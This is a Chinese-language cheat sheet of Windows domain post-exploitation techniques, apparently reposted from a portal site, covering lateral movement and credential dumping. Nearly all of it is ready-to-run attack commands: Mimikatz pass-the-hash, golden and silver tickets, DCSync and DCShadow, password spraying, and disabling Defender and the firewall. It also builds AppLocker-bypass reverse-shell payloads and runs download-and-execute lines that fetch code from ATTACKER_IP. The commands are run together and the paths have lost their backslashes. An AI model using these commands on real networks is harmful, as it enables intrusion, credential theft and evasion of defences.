后渗透之横向移动
存储凭证
列出存储的密钥cmdkey /list使用它们runas /user:administrator /savecred "cmd.exe /k whoami"
meterpreter获取token
use incognitolist_tokens -uimpersonate_token NT-AUTHORITYSystem
Mimikatz 传递票据
Enable-PSRemotingmimikatz.exe '" kerberos:ptt C:UsersPublicticketname.kirbi"' "exit"Enter-PSSession -ComputerName ECORP
WinRM
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force$cred = New-Object System.Management.Automation.PSCredential ('ECORP.localuser', $pass)Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }# Evil-WinRMhttps://github.com/Hackplayers/evil-winrmruby evil-winrm.rb -i 192.168.1.2 -u user -p pass -r evil.corp
传递hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
数据库链接
# PowerUpSQLhttps://github.com/NetSPI/PowerUpSQLGet-SQLServerLink -Instance server -Verbosepowershell.exe -c "Import-Module C:UsersPublicPowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORPsql"# 查看服务 select srvname from master..sysservers;# 执行命令Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"# 链接数据库的表select * from openquery("ECORPFOO", 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES') # 查询并尝试在该服务器上启用xp cmpshellselect * from openquery("server",'select * from master..sysservers') EXECUTE AS USER = 'internal_user' ('sp_configure "xp_cmdshell",1;reconfigure;') AT "server"
黄金白银票据
# 黄金票据# 提权krbtgt用户hashlsadump::dcsync /domain:evil.corp /user:krbtgtlsadump::lsa /injectlsadump:::lsa /patchlsadump::trust /patch# 创建票据# /rc4 or /krbtgt - NTLM hash# /sid dump krbtgt得到# /ticket 参数可选,默认是 ticket.kirbi# /groups 参数可选,默认是 513,512,520,518,519# /id 你可以伪造用户并提供有效的管理员idkerberos::golden /user:user /domain:AD.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 kerberos::ptt golden.tck # 查看票据是否在缓存里powershell.exe -c "klist"#验证黄金票据dir \DCC$psexec.exe \DC cmd.exe#清除缓存票据kerberos::purge #metasploit模块加载黄金票据post/windows/escalate/golden_ticket # 白银票据# 白银票据可以在域上提升权限# /target 目标主机 (ex: share.server.local, sql.server.local:1433, ...)# /service - 票据服务名 (ex: cifs, rpcss, http, mssql, ...)# 例如kerberos::golden /user:user /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local:1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103sqlcmd -S evilcorp-sql102.evilcorp.localselect SYSTEM_USER;kerberos::golden /user:user /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt
域渗透
# 基于ldap的枚举enum4linux -a 192.168.1.2python windapsearch.py -u user -p morph3 -d evil.corp --dc-ip 192.168.1.2python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
暴破ldap
# 破解工具https://github.com/dafthack/DomainPasswordSprayImport-Module .DomainPasswordSpray.ps1Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt# 暴破密码./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3 # 暴破用户./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt# Passwordspray避免错误次数锁定用户./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
DC Shadow
DCShadow是一种通过域控制器使用的合法API来修改活动目录中的现有数据的新型攻击技术,也就是增加一个影子域控,让正常DC通过伪造的DC中复制数据
#查看用户sidwmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid #监听一个rpc服务lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid# 另一个mimikatz运行lsadump::dcshadow /push# 完成之后注销# 重新登录lsadump::dcsync /domain:ECORP.local /account:krbtgt# 获取krbtgt hash#具体的百度dcshadow
DC Sync
lsadump::dcsync /domain:domain /all /csvlsadump::dcsync /user:krbtgt#####https://gist.github.com/monoxgas/9d238accd969550136dbpowershell.exe -c "Import-Module .Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"#####python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/[email protected] secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
Bypass 相关
powershell bypass 运行powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')PSByPassCLMpowershell.exe -exec bypass -c
Windows Defender
sc config WinDefend start= disabledsc stop WinDefend# PowershellSet-MpPreference -DisableRealtimeMonitoring $true# RemoveDefinitions"%Program Files%Windows DefenderMpCmdRun.exe" -RemoveDefinitions -All
Firewall
Netsh Advfirewall show allprofilesNetSh Advfirewall set allprofiles state off
ip 白名单
New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
Applocker ByPass
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.mdhttps://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.mdhttps://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md# MSBuild.exe 运行绕过msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i > out.cs # 替换buf-sc并将其保存为out.csprojhttps://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xmlInvoke-WebRequest "http://ATTACKER_IP/payload.csproj" -OutFile "out.csproj"; C:windowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe .out.csproj# 或使用下面工具https://github.com/morph3/Msbuild-payload-generatorsudo python msbuild_gen.py -a x86 -i 10 --lhost 192.168.220.130 --lport 9001 -m
GreatSCT 工具
python GreatSCT.py --ip 192.168.1.56 --port 443 -t Bypass -p installutil/powershell/script.py -c "OBFUSCATION=ascii SCRIPT=/root/script.ps1"C:WindowsMicrosoft.NETFrameworkv4.0.30319InstallUtil.exe /logfile= /LogToConsole=false payload1.exepython3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp --ip 192.168.1.56 --port 9001C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U payload.dll
EvilSalsa 工具
#准备 payloadspython EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txtEncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt#执行 payloadSalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001# 返回一个icmp shellpython icmpsh_m.py "ATTACKER_IP" "VICTIM_IP"SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP
其它杂项
#更改文件权限icacls text.txt /grant Everyone:Ftakeown.exe /f c:windowssystem32sethc.exe
下载文件
IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:WindowsTempmalware.exe") Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:WindowsTempmalware.exe" certutil.exe -urlcache -split -f "http://127.0.0.1:80/shell.exe" shell.exe
Base64加解密
certutil -encode foo.exe foo.b64 certutil -decode foo.b64 foo.exe
端口转发
# 使用 plinkplink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080# 使用 meterpreterportfwd add -l attacker-port -p victim-port -r victim-ipportfwd add -l 3306 -p 3306 -r 192.168.1.56
Powershell扫描
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) "Port $_ is open!"} 2>$null
恢复powershell安全字符串
######$user = "morph3"$file = "morph3-pass.xml"$cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }######[System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR("string"))######$Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)$result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)[System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)$result
注入powershell脚本到session
Invoke-Command -FilePath scriptname -Sessions $sessionsEnter-PSSession -Session $sess
Mimikatz解密EFS文件
privilege::debug token::elevate crypto::system /file:"C:UsersAdministratorAppDataRoamingMicrosoftSystemCertificatesMyCertificatesthecert" /exportdpapi::capi /in:"C:UsersAdministratorAppDataRoamingMicrosoftCryptoRSASIDid"# 清除文本密码 dpapi::masterkey /in:"C:UsersAdministratorAppDataRoamingMicrosoftProtectSIDmasterkey" /password:pass123# 执行此命令后,必须保存导出的.der和.pvk文件dpapi::capi /in:"C:UsersAdministratorAppDataRoamingMicrosoftCryptoRSASIDid" /masterkey:f2c9ea33a990c865e985c496fb8915445895d80bopenssl x509 -inform DER -outform PEM -in blah.der -out public.pemopenssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pemopenssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx# 导入证书certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoottype "C:UsersAdministratorDocumentsencrypted.txt"
渗透后期信息收集
查看日志
Get-WinEvent -ListLog *# 列出特定用户的日志$cred = Get-CredentialsGet -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred# 读取安全日志(Get-WinEvent -FilterHashtable @{LogName = 'Security'} | Select-Object @{name='NewProcessName'$_.Properties[8].Value }}).commandline
Dump密码
# Metasploitpost/windows/gather/enum_chromepost/multi/gather/firefox_credspost/firefox/gather/cookiespost/firefox/gather/passwordspost/windows/gather/forensics/browser_historypost/windows/gather/enum_putty_saved_sessions# Empirecollection/ChromeDumpcollection/FoxDumpcollection/netrippercredentials/sessiongopher# mimikatzprivilege::debugsekurlsa::logonpasswords
Shadow copy
复制影子文件(NTDS.dit,SYSTEM等)
diskshadow.exeset context persistent nowritersadd volume C: alias morph3createexpose %morph3% Z:delete shadows volume %morph3%reset
Ddump NTDS.dit
secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result localpython crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com --ntds drsuapi# mimikatzlsadump::lsa /inject
其它一些工具
https://github.com/DanMcInerney/icebreakerhttps://github.com/BloodHoundAD/BloodHoundhttps://github.com/EmpireProject/Empirehttps://github.com/byt3bl33d3r/DeathStarhttps://github.com/byt3bl33d3r/CrackMapExechttps://github.com/cobbr/Covenanthttps://github.com/GhostPack/Rubeushttps://github.com/GhostPack/SharpDPAPIhttps://github.com/Genetic-Malware/Ebowlahttps://github.com/Veil-Framework/Veilhttps://github.com/padovah4ck/PSByPassCLMhttps://github.com/SecureAuthCorp/impacket
本文来源于:内网渗透技巧及工具合集-变化吧门户
特别声明:以上文章内容仅代表作者本人观点,不代表变化吧门户观点或立场。如有关于作品内容、版权或其它问题请于作品发表后的30日内与变化吧联系。
- 赞助本站
- 微信扫一扫
-
- 加入Q群
- QQ扫一扫
-
评论